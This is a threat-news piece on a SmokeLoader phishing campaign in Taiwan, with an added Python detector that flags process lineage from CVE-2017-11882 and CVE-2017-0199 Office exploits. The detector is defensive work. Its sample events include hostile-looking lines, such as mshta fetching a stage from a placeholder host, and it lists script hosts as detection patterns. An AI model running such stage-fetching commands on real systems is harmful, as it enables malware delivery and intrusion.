A sophisticated malware campaign has emerged in Taiwan, specifically targeting organizations in manufacturing, healthcare, and IT industries. The attack utilizes SmokeLoader, a veteran malware strain first discovered in 2011, known for its advanced evasion capabilities and modular architecture.
Despite recent disruption efforts by Europol’s Operation “Endgame,” which eliminated 1,000 command-and-control domains and cleaned 50,000 infections, threat actors continue to deploy cracked versions of SmokeLoader found on underground forums.
The infection chain begins with phishing emails carrying Excel attachments that exploit two long-patched Office vulnerabilities (CVE-2017-0199 and CVE-2017-11882). Once the document is opened and the exploit fires, Ande Loader is deployed, followed by SmokeLoader’s two-component design: a stager that decrypts and injects the payload, and a main module that handles persistence and command-and-control communication.
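The detection angle on that chain is that both CVEs leave a recognisable process-lineage footprint: CVE-2017-11882 lives in the Equation Editor binary (EQNEDT32.EXE, launched through DCOM, so its parent is usually svchost.exe rather than the Office process), and CVE-2017-0199 typically hands execution from the Office application to a script host such as mshta.exe. The following is an added example, not code from the article or from any vendor report, that classifies process-creation events along those lines. The event records are constructed, the field names (parent_image, image, command_line) are assumed to mirror a Sysmon Event ID 1 export, and the URL and file names are placeholders.

```python
"""Classify process-creation events for lineage consistent with the Office
exploit chains named above (CVE-2017-11882 Equation Editor abuse, CVE-2017-0199
OLE/HTA handler abuse).  Added example; all sample events are constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# EQNEDT32.EXE is the Equation Editor component fixed by CVE-2017-11882.  It is
# started through DCOM, so its parent is normally svchost.exe rather than the
# Office process; keying on the image name itself avoids that blind spot.
EQUATION_EDITOR = "eqnedt32.exe"
# Script hosts and LOLBins a malicious document usually hands execution to
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Locations a document can write to; a loader dropped here is typical of staged chains
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process (assumed field name)
    image: str          # full path of the created process (assumed field name)
    command_line: str   # command line of the created process (assumed field name)


def basename(path: str) -> str:
    """Lower-cased file name, tolerant of either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a suspicious event, or None if it looks benign."""
    parent, image = basename(ev.parent_image), basename(ev.image)
    if image == EQUATION_EDITOR:
        return ("medium", "Equation Editor started; rare on patched hosts and the CVE-2017-11882 vector")
    if parent == EQUATION_EDITOR:
        return ("high", f"Equation Editor spawned {image}; post-exploitation of CVE-2017-11882")
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        return ("high", f"{parent} spawned {image}; consistent with CVE-2017-0199 OLE/HTA handler abuse")
    if parent in OFFICE_APPS and USER_WRITABLE.search(ev.image):
        return ("high", f"{parent} launched a binary from a user-writable path; possible dropped loader")
    return None


def scan(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Run classify() over a list of events and return (index, severity, reason) hits."""
    alerts = []
    for idx, ev in enumerate(events):
        verdict = classify(ev)
        if verdict is not None:
            alerts.append((idx, verdict[0], verdict[1]))
    return alerts


# Constructed sample telemetry: two benign lines, four that match the chain.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xlsx'),
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r'"EQNEDT32.EXE" -Embedding'),
    ProcEvent(r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c <placeholder-stage-command>"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://placeholder.invalid/stage.hta"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\splwow64.exe",      # 32-bit print helper, normal child of Office
              r"C:\Windows\splwow64.exe 12288"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Users\alice\AppData\Roaming\loader.exe",
              r"loader.exe"),
]

if __name__ == "__main__":
    for idx, sev, why in scan(SAMPLE_EVENTS):
        print(f"[{sev.upper()}] event {idx}: {why}")
```

The Equation Editor rule is deliberately split in two: merely seeing EQNEDT32.EXE run is worth a medium alert on a fleet where Equation Editor has been removed or patched, while EQNEDT32.EXE acquiring a child process is the point at which the exploit has succeeded. The user-writable-path rule catches the hand-off to a dropped loader (the Ande Loader step in the article's chain) without needing a hash for the specific sample.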
SmokeLoader’s arsenal includes credential theft from various applications, DDoS attack capabilities, cryptocurrency mining, and expandable functionality through plugins. The malware’s sophisticated features include environment detection, fake traffic generation, and code obfuscation, making it particularly challenging to detect and analyze.
This resurgence demonstrates the persistent threat of well-established malware tools, even after significant law enforcement interventions.